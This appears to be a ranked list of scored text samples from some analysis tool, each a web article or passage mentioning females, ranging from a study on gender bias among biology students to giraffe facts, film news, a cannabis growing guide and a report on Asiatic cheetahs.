in undermining their confidence. + +Published this week in the journal PLOS ONE, the study* found that males enrolled in undergraduate biology classes consistently ranked their male classmates as more knowledgeable about course content, even over better-performing female students. + +The over-ranking equated to males ranking their male peers smarter by three-quarters of a GPA point* than their equally-performing female classmates, showing what researchers say amounts to a clear and consistent gender bias. Female students, on the other hand, repeatedly showed no significant bias in whom they picked as knowledgeable. + +"This shows that there is a huge inequity in who male students think is strong in the class materials," said lead author Dan Grunspan, a doctoral candidate in the UW Department of Anthropology. + +"Males were consistently nominated as being more knowledgeable by their male peers, regardless of performance." + +The study involved surveying around 1,700 UW students enrolled in the same undergraduate biology course. Students in three classes were asked to name the classmates they considered strongest in their understanding of class materials at multiple points in the course. Additionally, instructors were surveyed on which students were most outspoken in class -- an effort to determine which students would be most visible to other students as knowledgeable, given the large class size. More males than females were considered outspoken by the instructors, the researchers found. + +Even after accounting for differences in performance and outspokenness, male students got more recognition from other males than their female peers did, and the finding was consistent across 11 different class surveys. For an outspoken female student to be nominated by males at the same level as a male student, her performance would need to be more than three-quarters of a GPA point* higher than the males. + +"Using UW's standard grade scale, that's like believing a male with a B and a female with an A* have the same ability," said co-lead author Sarah Eddy, who participated in the research as a UW postdoctoral biology researcher and is now a research scientist at the University of Texas, Austin. + +On the other hand, females nominated their male and female peers almost equitably across all the surveys, after controlling for differences in performance and outspokenness. The researchers determined that the female bias was so small it could have arisen by chance, and they estimate that gender bias among male students was 19 times stronger than among +================================================================================ +Rank = 21; Score = 520192.0 +<|begin_of_text|>Fundamentals of Graduate School Tipping Below are the answers to three fundamental questions every new graduate student needs to know. Who to Tip? The answer to the "who" question becomes obvious when we consider that tipping is meant to reward good service. Those who service1 graduate students are (listed in increasing order of importance) their professors, their advisory committees, and the thesis clerk. How Much to Tip? Some universities still encourage a graduated tipping scale, "tipped" in favor of full professors. This arcane structure should not be followed. Instead, plan to tip each of your professors, regardless of academic rank, the customary 15% of the course registration fee (10% at MIT and Stanford). Of course, there will be exceptions to this guideline, so don't be afraid to increase or decrease the tip as the situation warrants. However, before "stiffing" a professor, bear in mind that your professor is obliged to share a percentage of his or her tip with those who render service but don't actually come in contact with the student, e.g., Department Chairs, Deans, Assistant Deans, Academic Deans, Graduate School Deans, etc. It is customary to tip all the members of your Thesis Advisory Committee. A good rule of thumb is to tip the committee chair the equivalent of two months salary2 (De Beers 1980). Other committee members should receive about half that amount. Not surprisingly, this guideline has contributed to streamlined committees comprised of the minimum number of members. Finally, plan to tip the thesis clerk generously. If the clerk is female, it is difficult to provide precise guidelines without knowing which coven she belongs to, but a good estimate is two dollars for each page in the main body of the thesis or dissertation. Male thesis clerks generally receive about 60-70% of what female clerks get for the same work. On rare occasions dating the thesis clerk has proven nearly as effective as a generous tip, but this is considered risky, at best.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 512000.0 +<|begin_of_text|>At San Diego Comic-Con over the weekend, Captain Marvel co-writer Nicole Perlman sat down with Wired to talk about her and Meg LeFauve’s preparation for the 2018 movie: + +We’ve been talking a lot about archetypes and what we want this movie to be about and just how to write a strong female superhero without making it Superman with boobs. Meg and I are doing a lot of brainstorming and we’ll catch ourselves and say, ‘Wait a minute, what are we saying [here] about women in power?’ Then we have to say, ‘Why are we getting so hung up on that? We should just tell the best story and build the best character.’ + +Perlman, who became the first female writer for a Marvel Studios movie ever when she co-wrote Guardians of the Galaxy with James Gunn, says Captain Marvel is proving a little more complicated to write than the universe’s favorite gang of A-holes: + +We have this constant back-and-forth about how to tell a story that is compelling, entertaining, moving, kick-ass, and fun, and also be aware of what those larger implications might be. It’s a lot more complicated than just writing [Guardians of the Galaxy]. + +Hollywood affords women (both female creators and female characters) fewer opportunities or second chances than it does men, so it makes sense that Perlam and LeFauve would be acutely aware of the pressure placed on Captain Marvel to succeed. Given the lack of female superhero movies overall, Captain Marvel may be expected to both positively represent all women and prove to Marvel that lady-led movies are bankable, but it’s not Perlman and LeFauve’s fault that female fans are so incredibly underserved. + +In other words, it’s reassuring to see that the pair are considering the context in which Captain Marvel is being made, but that they’re realistic about the movie’s limitations as well. + +Thoughts, gang? + +(via Newsarama) + +—Please make note of The Mary Sue’s general comment policy.— + +Do you follow The Mary Sue on Twitter, Facebook, Tumblr, Pinterest, & Google +?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 23; Score = 497664.0 +<|begin_of_text|>At the Milken Institute Global Conference in May, moderator Rick Smith controversially asked five successful female entrepreneurs how they convinced male VCs to invest in female-oriented businesses. The ladies were candid. Alexandra Wilkis Wilson, co-founder of Gilt and GLAMSQUAD, admitted it is harder; the panelists — including Jessica Alba of Honest Company and Susan Feldman of One Kings Lane — agreed. + +It’s no secret that the tech industry is very much a man’s world. Recent U.S. Equal Employment Opportunity Commission figures show 80 percent of executives in high-tech are male, and just 20 percent are female. In the Bay Area in 2015, just 8 percent of Series A startup funding went to female-led businesses, down from 30 percent in 2014. + +While the biggest names in tech strive to close the gender gap and build more inclusive working environments, the pool of talent on offer is predominantly male. The truth is, while retention is an issue, there are simply fewer women opting for a career in tech. + +But new initiatives and an uptick of Gen Z girls opting for sciences in top-tier universities paints a very different future. What are these young women doing that previous generations have not? And what does this all mean for Silicon Valley’s boys’ club? + +What’s holding back females in tech + +According to Ariane Hegewisch, a study director for the Institute for Women’s Policy Research, females make the decision to steer clear of sciences at a young age. CNET reported at Indiana University, 97 percent of new female students opt for subjects outside of science and computing. “It doesn’t occur to them as a career path,” said Maureen Bliggers, assistant dean for diversity and education at Indiana’s School of Informatics. + +The proportion of female students in science, technology, engineering and mathematics (STEM) university courses has traditionally been very low, and, according to the National Student Clearinghouse, it is getting worse. 2014 figures show just 18 percent of computer science bachelor degrees and 19 percent of engineering degrees held by women. In subjects such as biology and social sciences, we start to see the tables turn, with a larger proportion of females. + +While the number of women in sciences is growing, they are still vastly outnumbered by males. Statistics suggest that this dwindling ratio of women in tech may be a case of nurture over nature. In May, the National Assessment of Educational Progress (NAEP) revealed better performance from girls over boys in a test of +================================================================================ +Rank = 24; Score = 493568.0 +<|begin_of_text|>ADVERTISEMENT + +The Giraffe (Giraffa camelopardalis meaning ‘fast walking camel leopard) is an African even-toed ungulate mammal, the tallest of all land-living animal species. + +The giraffe is related to deer and cattle, however, it is placed in a separate family, the Giraffidae, consisting only of the giraffe and its closest relative, the okapi. + +The giraffes range extends from Chad to South Africa. Although the Okapi is much shorter than the giraffe, it also has a long neck and eats leaves and both animals have long tongues and skin-covered horns. The giraffes ancestors first appeared in central Asia about 15 million years ago, however, the earliest fossil records of the giraffe itself, from Israel and Africa, date back about 1.5 million years. + +Male giraffes are called ‘Bulls’, female giraffes are called ‘Cows’ and baby giraffes are called ‘Calves’. + +Giraffe Characteristics + +The giraffe is the tallest living animal which is instantly recognizable by its exceptionally long neck. Adult males stand 15 – 19 feet (4.6 – 6.0 metres) tall, whereas females are shorter at 13 – 16 feet (4 – 4.8 metres) tall. Adult males weigh between 1,764 – 4,255 pounds (800 – 930 kilograms), while females weigh only 1,213 – 2,601 pounds (550 – 1,180 kilograms). The giraffe has the longest tail of any land mammal. Their tail can grow to be 8 feet (2.4 metres) long, including the tuft on the end. + +In addition to its great height, the giraffe is also one of the heaviest land animals. Exceptionally large males may weigh up to 1,900 kilograms (about 4,200 pounds). Female giraffes are smaller, rarely reaching half that weight. Compared to other hoofed mammals the giraffe has a relatively short body, however, its legs are disproportionately long. + +A giraffes front legs are about 10% longer than their hind legs, a feature that contributes to the animals steeply sloping back. Mature giraffes have large hooves about the size of dinner plates, around 12 inches wide. + +Giraffe Habitat + +Giraffes can inhabit savannas, grasslands or open woodlands. Giraffes prefer areas enriched with acacia growth (a +================================================================================ +Rank = 25; Score = 479232.0 +<|begin_of_text|>Since opening in theaters at the start of June, Wonder Woman has taken in $657 million worldwide and earned an impressive 92 percent on Rotten Tomatoes, while being widely heralded as a milestone for female heroes in cinema. However, not everyone's a fan. + +Alicia Silverstone -- who's no stranger to playing a female superhero after her turn as Batgirl in 1997's critically-panned Batman & Robin-- recently sat down for an interview with Variety, where she downplayed the impact that Wonder Woman, and star Gal Gadot, have had on feminism in mainstream Hollywood. + +NEWS: Lupita Nyong'o Calls 'Wonder Woman' 'Fierce, Sensual' and 'Just Amazing' + +"Before Wonder Woman… there have been many movies with female leads. So I get a little confused [about the conversation]," Silverstone shared. "I think about, ‘But what about all those wonderful comedians who are females who have had massive hits?'" + +"I don’t know. I just feel like, over the years, there was Mean Girls, there was Clueless, over time we have had so many movies that have been female-driven," she continued. + +WATCH: Alicia Silverstone Reveals Her Biggest 'Clueless' Regret and the Real Life Mean Girl Who Inspired Cher! + +Silverstone, who starred in the 1995 teen comedy Clueless, is getting ready for the 2018 debut of her new Paramount Network series, American Woman, in which she plays a single mother in the 1970s -- milestone years for the progression of feminist political efforts. + +However, Silverstone said that it seems like themes of female empowerment are often only accepted when they come in the form of big blockbuster epics. + +"It has to be Wonder Woman. It has to have tons of flash, right?" she said, adding, "Sometimes it's the quieter, more interesting things that sometimes [make a difference] because they touch someone enough." + +NEWS: 'Wonder Woman' Director Patty Jenkins Is Ready to Direct the Sequel, Says Film Came at a Perfect Time + +Silverstone recently sat down with ET where she opened up about the 20th anniversary of Batman & Robin, and admitted that she'd love to reprise her role as Batgirl -- with a few caveats. + +"I'd like to do it again. I think if I did it right now I'd be a much better Batgirl," she explained, adding that she'd want to see some changes when it came to her costume: +================================================================================ +Rank = 26; Score = 477184.0 +<|begin_of_text|>IN A CASE of square peg, round hole syndrome, the national research officer of Australian Christian political party FamilyVoice Australia has defended herself against a press release that has left people scratching their heads across the country. + +Ros Phillips sent a press release yesterday claiming the recent change to same-sex marriage laws in the ACT would confuse tradies including plumbers, electricians and carpenters. + +The release included a diagram depicting appliances and plumbing equipment being joined together - like male and female sex organs. + +"As any tradie can tell you, marriage has always been a joining of two opposites. You cannot properly unite two of the same," Mrs Phillips said. + +"By definition, marriage is a complementary, male-female union. Only that union has the potential to create and raise children with both male and female role models. + +"It is not 'equality' to disregard reality. A same-sex couple will always be different from an opposite sex couple. + +"Let's not confuse apprentice electricians, plumbers and carpenters in the ACT - lest the lights go out, the drains leak and the chairs collapse in the Legislative Assembly!" + +Today, Ms Phillips told news.com.au the release was a "lighthearted way of pointing out the reality that marriage was always between a male and female". + +"That's the only reason governments have any interest in registering marriages, because of their potential to create and raise the next generation." + +ACT marriage law is a nonsense: ask any tradie #actpol... http://t.co/9bh2XZWsfJ — SaveMarriageACT (@SaveMarriageACT) October 23, 2013 + +She also criticised the gay community for changing its stance in the last two decades on the issue of gay marriage. + +"Just a couple of decades ago, the homosexual lobby wasn't interested in marriage, they said 'why would we be interested in such an archaic tradition?' + +"Now they've changed and decided it's suddenly a good thing. Underneath it all they don't want marriage, they want to change it." + +She scoffed at the idea the press release could be seen by some as offensive. + +"Since most people have taken it as a lighthearted press release, no I don't think it could be seen as offensive. + +"It's true, electricians and plumbers use male and female parts to make joints, it's been around for a very long time." + +This week, a decision to legalise same-sex marriage in Canberra was approved by the ACT Legislative Assembly. + +The Abbott Government has already lodged legal +================================================================================ +Rank = 27; Score = 464896.0 +<|begin_of_text|>Florida's Department of Corrections is being accused in a lawsuit by the American Civil Liberties Union of failing to provide medical treatment to a 22-year-old transgender woman who has been living as a female since she was 14. File Photo by f11photo/Shutterstock + +TALLAHASSEE, Fla., Aug. 16 (UPI) -- The American Civil Liberties Union filed a lawsuit against the Florida Department of Corrections, accusing a state men's prison of refusing to provide medical treatment to a transgender woman. + +Reiyn Keohane, 22, has been living as a female since she was 14 years old and began hormone therapy at the age of 19, the ACLU of Florida said in a statement. While facing an attempted murder charge in 2013, Keohane was refused the ability to continue her hormone therapy by the Lee County Jail, the ACLU writes. + +"Keohane accepted a plea deal for the charge in 2014 with the understanding that she would be allowed to return to her hormone therapy after being transferred to DOC custody. However, she has been repeatedly denied this treatment since her transfer," the ACLU said. + +The ACLU said Keohane told DOC officials she needed to continue her treatment for gender dysphoria -- the treatment being both hormone therapy and the ability to groom and attire herself as female. + +"She has had female clothing items confiscated. She has filed numerous grievances to restore her treatment, but has been repeatedly denied," the ACLU writes. + +Keohane wrote a guest blog post for the ACLU in which she describes her past years under the care of the Florida prison system. + +"In the years I have been incarcerated, I have been made to endure more cruelty by the State of Florida than I ever imagined the government could commit. I am a transgender woman -- but to the classification officers there is no such thing," Keohane writes. "I have been forced to strip with men, and been slapped and hit for telling the officers in charge of the search that the rules say I must be searched separately. I have been handcuffed, thrown to the ground, and held down so officers could shave my head. I have been called a punk, a sissy, and a [explicit]; I have been beaten while handcuffed for asking to see mental health professionals." + +RELATED Man charged with killing of New York imam and assistant + +The ACLU is asking the Tallahassee Division of the U.S. District Court of the Northern District of Florida to find the Florida DOC's alleged denial of treatment for Keohane's +================================================================================ +Rank = 28; Score = 460800.0 +<|begin_of_text|>Allegations of a cover-up of sexual assaults at the Motion Picture Country House and Hospital have been leveled on behalf of one of the women who was allegedly assaulted there. + +Attorneys for Sylvia Mathes, one of more than a dozen elderly women who were allegedly assaulted by a fellow resident, now claim an unidentified attorney for the Motion Picture Television Fund, which runs the skilled-nursing facility in Woodland Hills, CA, lied to them and tried to cover up the cover-up by claiming a key witness could not give her deposition earlier this month because she had pneumonia, when in fact she was ready and willing to be deposed. + +As previously reported, the MPTF was accused of a “cover up” of numerous sexual assaults of female residents at its famed Alzheimer’s unit, known as Harry’s Haven. + +Separate lawsuits filed by Mathes, the mother of writer-producer Gerald Sanoff, and retired costumer Nancy Renard, claim that they and 11 other female residents were sexually assaulted by Rafael Palacios, a former longtime employee of the Fund before becoming an Alzheimer’s patient there. + +Palacios is named as a defendant in both suits, which note that “his dementia was becoming so severe that he simply lacked the mental ability and capacity to control his actions.” + +Those complaints allege that the Fund has “long known, and covered up, that they freely allowed a sexual predator to roam their halls endangering residents” and, as a result of their “conspiracy of silence,” failed to protect the residents and allowed Palacios to “physically abuse and sexually assault” them. + +In her suit, filed in August, Mathes claims she was “physically assaulted” by Palacios in July and that managers there had not taken adequate precautions to protect her from him, even though the police had been called on at least two previous occasions. Her suit states that in April, Palacios “was found on top of a female resident and the police were called” and that they were called again in May when he “was found on top of another female resident.” The suit alleges he was found on top of another female resident on June 16 and that, a few days later, he was “found on top of another female resident ‘humping.’ ” + +But in an amended complaint filed in Los Angeles Superior Court (read it here), attorneys for Mathes now claim a key witness to the alleged assaults and cover-up was kept from giving her deposition in the case through false pretenses. + +The witness, Diane Shaw, is a longtime staffer at +================================================================================ +Rank = 29; Score = 460800.0 +<|begin_of_text|>Are you curious about the natural life cycle of the cannabis plant? Do you want to try your hand at producing your own marijuana harvest, but are unsure about how, exactly, to go about it? Well have we got a treat for you! + +In this article, the experts at Honest Marijuana will examine the seven key stages of the marijuana plant life cycle. Along the way, we’ll discuss: + +The importance of labeling the sex of your seeds + +How to encourage germination + +How to recognize embryonic leaves on a marijuana plant seedling + +The importance of light during the vegetative stage + +The difference between the male and female plants + +Why you need to isolate the female plants if you want to produce the most bud + +The best ways to harvest and preserve your marijuana plant + +Planning for the next growing season + +After that, we’ll guide you through the entire growth process of the marijuana plant—from germination to seedling; through vegetation, pre-flowering, and flowering; to harvesting and the next seed life-cycle stages of your pot plant. + +So strap yourself in for a wild ride through the basic biology of your favorite weed. It’s sure to be an enjoyable trip. We’ll start our journey where all good journeys begin: at the origin, the source, the seed. + +Stage #1: The Marijuana Plant Seed + +Source: Pinterest.com + +Pick up any seed and examine it closely. Turn it over and around. Feel the weight. Notice the shape and the color. Now tell me if that seed is going to produce a male marijuana plant or a female marijuana plant. Can’t do it, can you? Don’t feel bad. No one can. + +But that introduces a major problem into the world of do-it-yourself ganja growing: how can you be sure the seeds you plant will produce the marijuana you want? This is an important question because only the female plant produces the trichome-rich cola buds that you can harvest to smoke, vape, dab and ingest. + +The male plant produces none of that. In fact, the male marijuana plant can actually be a detriment to your cannabis harvest if grown together with female plants. This is because the male plant’s sole purpose is to pollinate the female plants. And while that doesn’t sound like a bad thing, it actually is. + +When female marijuana plants are pollinated, they start using their energy to produce seeds and stop using their energy to feed the buds that we all know and love. Allowing a male plant to grow alongside a female plant is a recipe for reduced bud harvest +================================================================================ +Rank = 30; Score = 458752.0 +<|begin_of_text|>When video game historians look back on their medium’s history, they won’t want to remember 2014. It was a bad year for video games. Not the games themselves, really—there were plenty of fine games released last year. No, it was a bad year for the culture of video games. Last year was, of course, the year of Gamergate. The year when everybody got to see the worst parts of that vast swath of people who call themselves “gamers.” The ones who ruined that word for the rest of us. The “movement’s” rampant misogyny hit the mainstream and hit it hard.Gamergate is still around. The petulant children who threatened female video game developers and personalities for daring to, um, have an opinion are still there. But no one is talking about them. No one cares about them.And it seems that maybe, just maybe, we’re starting to learn from them.There have been more than a few instances where women lamented the lack of female protagonists in video games. The response was invariably something to the effect of, “If you don’t like it, go make your own games,” with some slurs and/or threats thrown in for good measure. And though there are dozens of things wrong with that line of thinking, the most practically obvious is the fact that the games they were asking about weren’t the sort of titles that a few people can just get together and make. They wanted (and want) games with $50+ million budgets that star interesting female characters. And let’s not pretend like this only goes one way. I want that too. I’m sick of playing as muscly men. I think the vast majority of us are. + +And though this year’s Electronic Entertainment Expo (E3) underwhelmed, there was a glimmer of light that maybe, just maybe, people working in the industry are too. It’s the largest gaming event of the year, where the industry’s companies tell the world what to expect from them in the year(s) to come. And more than a half-dozen new games were unveiled with female protagonists or generally playable female characters. The gender gap is still a chasm, to be sure, but these are significant first steps. + +There’s a new Tomb Raider game coming out. Lara Croft is undoubtedly the most famous female video game protagonist, what with Angelina Jolie’s portrayal of her in some not-particularly-good film adaptations of the series. But for far too long, Lara Croft has been the +================================================================================ +Rank = 31; Score = 452608.0 +<|begin_of_text|>More than 60 per cent of Muslim conver­ts are women. + +LONDON: A new study has shown that the number of British people converting to Islam has almost doubled since 2001. + +The study, titled “A Minority Within a Minority” and carried out by the inter-faith think-tank Faith Matters, estimates that the number of converts to Islam may have risen from about 60,000 in 2001 to up to 100,000 today. Some 5,200 people are embracing Islam each year in the UK, according to the study’s author Kevin Brice of Swansea University. + +“We must stress that this is an estimate and this figure is reached based on a survey of mosques and the 2001 census figures for England and Wales and Scotland,” says Fiyaz Mughal, founder and director of Faith Matters. + +This is despite the generally negative portrayal of Islam and of converts in the media. “Converts to Islam are unfortunately viewed predominantly through the lens of fear and are regarded as being connected to extremism,” says Mughal. + +The study found that media representations of converts to Islam were either linked to terrorism or fundamentalism. + +So why are people choosing Islam despite its vilification in the media? “I think people are more inquisitive now and want to find out more,” explains Mughal. “There is also much more contact with Muslims in urban areas.” + +Peter Sanders is a well respected photographer who converted to Islam in 1971.“People are looking for something that western society is failing to provide,” he says. “Despite the fact that it is getting increasingly difficult to dissociate Islam from the political picture, more and more people seem to feel that it provides a solution for something they are looking for.” + +Perhaps another surprising finding is that 62 per cent of converts are female while the average age of the convert is 27.5 years. The vast majority of these women adopted the hijab and although the majority personally disagree with the niqab they support the right of others to adopt it. + +The study conducted a survey of 122 converts and asked respondents what had been the reasons for their conversion. “The spiritual aspect was more marked in the answers from the women who want an alternative to a materialistic lifestyle,” says Mughal. “For men it was more about a sense of idealism and social justice.” + +Published in The Express Tribune, January 8th, 2011. + +Read full story<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 446464.0 +<|begin_of_text|>Iranian Cheetah Society says situation is critical as numbers of the subspecies continue to dwindle + +Conservationists say only two female Asiatic cheetahs are known to be alive in the wild in Iran, which hosts the last surviving population. + +Asiatic cheetahs, also known as Iranian cheetahs, are a subspecies of the fastest animal on earth and classified as critically endangered, with fewer than 40 believed to remain in Iran. + +As part of efforts to raise the animal’s profile, in the past decade cheetahs have been displayed on the national football team’s kit and on stamps, but it has become increasingly imperilled. + +Tuesday was Iran’s national cheetah day, marking an event more than two decades ago when a cub named Marita survived an attack by a group of villagers in which his mother and two siblings were killed. Marita became a national symbol. + +Morteza Eslami, head of the Iranian Cheetah Society (ICS), a Tehran-based NGO, said camera traps in areas with the most Asiatic cheetahs had seen just two females in recent months. + +“The situation is very critical,” he said. “We have been monitoring the situation closely in the past five years and the population of female Asiatic cheetahs has significantly dropped.” + +Delaram Ashayeri, an independent conservationist, said: “Unfortunately the number of female cheetahs has been dwindling. In areas where camera traps have been operating for a long time … we are not seeing many female cheetahs or we’re seeing only carcasses.” + +In the past 15 years, 48 cheetahs are believed to have died, seven from natural causes, 21 at the hands of farmers, 15 in car accidents and five as a result of hunting. + +Of the two female cheetahs believed to be still alive, one is in Turan national park and the other in the nearby Miandasht reserve. + +“In some of our other environmental areas we haven’t had any reports of female cheetahs for at least two years now, including in an area near the city of Yazd where only four male cheetahs survive,” Eslami said. + +Two Asiatic cheetahs – a male, Koushki, and a female, Delbar – are held in captivity at Tehran’s Pardisan Park research centre. They have not yet successfully mated. + +India mourns crocodile-wrestling 'Queen +================================================================================ +Rank = 33; Score = 442368.0 +<|begin_of_text|>It is a truth universally acknowledged that any fan film project that gets written up on Den of Geek and feminist blog The F Word in the same week is bound to be doing something interesting. And The Girls on Film project does prove that made-up aphorism right. + +This group of three film-makers takes well-known film scenes starring male actors and reproduces them shot-for-shot with female actors. It's a very simple idea that produces startling and fascinating results. Although this is a fan project and budgets must be tight, clever staging and some inspired direction result in scenes that are great fun to watch. There's even a reworked Star Trek scene, but its pure JJ Abrams – no wobbly sets here. + +The Bechdel test offers a simple way of looking at how a film treats its female characters. To pass the test, a film should have at least two female characters who have names and talk to each other about something other than men. Of course, these gender-flipped clips all pass this test with flying colours. With meaty, male roles in their possession, the women in each clip have long, interesting conversations. But it's depressing how many real films fail this pretty basic test. I'm sure the original versions of the movies that have been given the Girls on Film treatment – Star Trek, Fight Club and The Town – don't come close. + +Women are underrepresented on- and off-screen in the sausage-fest that is the film industry. The lazy thinking goes that male audience members can only identify with another man, but ever-helpful women will do the extra work required to identify with someone of the opposite sex. I think this is simply untrue; women put up with the fact that they have to do a certain amount of empathising with a male lead character to enjoy most films, but women are crying out for more films with female protagonists. So much so that the rare films that do feature women often do astoundingly well: Twilight, Sex and the City and Mamma Mia are films that drew a huge female audience –and perplexed some – but I'd offer that the big reason why these movies were hits was simply because they featured central female characters who actually got to do things. + +The Girls on Film project also raises a more subtle point. Do we need more films about what is typically seen as "female", or do we just need to relax more about which roles women can play? What is most astonishing about these gender-switched scenes is how well they work. The Girls on Film deliberately choose the most blo +================================================================================ +Rank = 34; Score = 442368.0 +<|begin_of_text|>Women dominated in 7 of 11 areas, yet all we hear about is gender imbalance in STEM. + +There are seemingly endless programs and advocates to increase the participation of women in STEM (Science, Technology, Engineering and Mathematics) as a means of addressing the gender imbalance, which is particularly dramatic at the graduate and doctoral levels. + +The National Science Foundation has special grant programs. The White House emphasizes the issue. Efforts are made at the elementary and secondary school levels to increase participation by girls. + +One of my daughters was a computer science major in college (the only female CS major that year), so I’m well aware of the extensive outreach to women. + +Despite years of concerted efforts, the STEM gender imbalance has barely moved. Men still dominate, by a lot. + +But the gender imbalance is equal or even more dramatic in fields dominated by women, as this chart shows (via AEI, h/t Ron Coleman): + +AEI continues, Women earned majority of doctoral degrees in 2013 for 5th straight year, and outnumber men in grad school 137.5 to 100 + +The Council of Graduate Schools (CGS) recently released its annual report recently on US graduate school enrollment and degrees for 2013, and here are some of the more interesting findings in this year’s report: 1. For the fifth year in a row, women in 2013 earned a majority of doctoral degrees. … Therefore, 2009 marked the year when men officially became the “second sex” in higher education by earning a minority of college degrees at all college levels from associate’s degrees up to doctoral degrees. 2. By field of study, women earning doctoral degrees in 2013 outnumbered men in 7 of the 11 graduate fields tracked by the CGS (see top chart above): Arts and Humanities (52.3% female), Biology (51.3%, and one of the STEM fields), Education (67.7%), Health Sciences (71,7)%, Public Administration (64.2%), Social/Behavioral Studies (61.8%) and Other fields (50.5%). Men still earned a majority of 2013 doctoral degrees in the fields of Business (55% male), Engineering (76.9%), Math and Computer Science (74.2%), and Physical Sciences (65.3%). 3. The middle chart above shows the gender breakdown for master’s degrees awarded in 2013 (from Table 2.24) and the gender disparity in favor of females is significant – women earned 58 +================================================================================ +Rank = 35; Score = 438272.0 +<|begin_of_text|>A connection between lesbian lust and identifying as male came to me after reading the prologue to Audre Lorde’s Zami : A New Spelling of My Name (full text here.) Lorde describes wanting to be both male and female and she fantasized about having a penis. It’s increasingly common for lesbians to think they are men so I think this needs to be discussed. In this post I’m going to describe my interpretation of Lorde’s quote, which was written in 1982, and then discuss the phenomenon of lesbians feeling “male” within the current context of porn culture and transgenderism. + +“I have always wanted to be both man and woman, to incorporate the strongest and richest parts of my mother and father within/into me—to share valleys and mountains upon my body the way the earth does in hills and peaks. I would like to enter a woman the way any man can, and to be entered—to leave and to be left—to be hot and hard and soft all at the same time in the cause of our loving. I would like to drive forward and at other times to rest or be driven. When I sit and play in the waters of my bath I love to feel the deep inside parts of me, sliding and folded and tender and deep. Other times I like to fantasize the core of it, my pearl, a protruding part of me, hard and sensitive and vulnerable in a different way. I have felt the age-old triangle of mother father and child, with the “I” at its eternal core, elongate and flatten out into the elegantly strong triad of grandmother mother daughter, with the “I” moving back and forth flowing in either or both directions as needed. Woman forever. My body, a living representation of other life older longer wiser. The mountains and valleys, trees, rocks. Sand and flowers and water and stone. Made in earth.”-Audre Lorde + +This quote is rather poetic and I have allowed myself to see lots of things in it that I don’t know if Lorde actually intended. These are some things I see when I look at these words. + +Lorde has described wanting the best qualities of her mother and father and wanting to be both hard and soft during sex. When I read this I thought about how people are expected to limit their self-expression and interests to what society believes is appropriate for their sex, and Lorde is refusing to limit herself that way. She wants the full human experience, not just a half of it. Gender roles and +================================================================================ +Rank = 36; Score = 432128.0 +<|begin_of_text|>A new documentary from VICE showcases Sweden’s introduction of government-funded gender-neutral kindergartens and a set of parents who are raising their children “without gender.” + +A new VICE documentary, which was published on Tuesday follows the story of intersex parent Del LaGrace Volcano, an American photographer, who is raising children outside of the confines of gender stereotypes. + +In Sweden, state-funded gender-neutral kindergartens are on the rise. According to the documentary, a gender-neutral personal identifier, “hen,” is commonly used throughout Swedish society. Del’s child, Mika, who was born a biological male, wears dresses and has long hair, which is often styled with braids that are dyed pink. + +During a portion of the documentary in which Del takes Mika and Nico out shopping, they run into a family they know with a young child who is also being raised without a gender. A biological male, Cory wears dresses and ties his hair back in a pony tail. “Now he has started to see that he’s a girl. The other day he’s a boy and sometimes he’s a cat,” Cory’s mother says. “It’s good for him. It’s a part of his childhood.” She goes on to say something quite significant: “He can be whoever he wants or dress however he wants for that short time because society will have its toll on him anyway.” There is an implicit suggestion that social conditioning almost exclusively defines gender. Later, Cory tells the VICE reporter that his favorite piece of clothing is his Spiderman 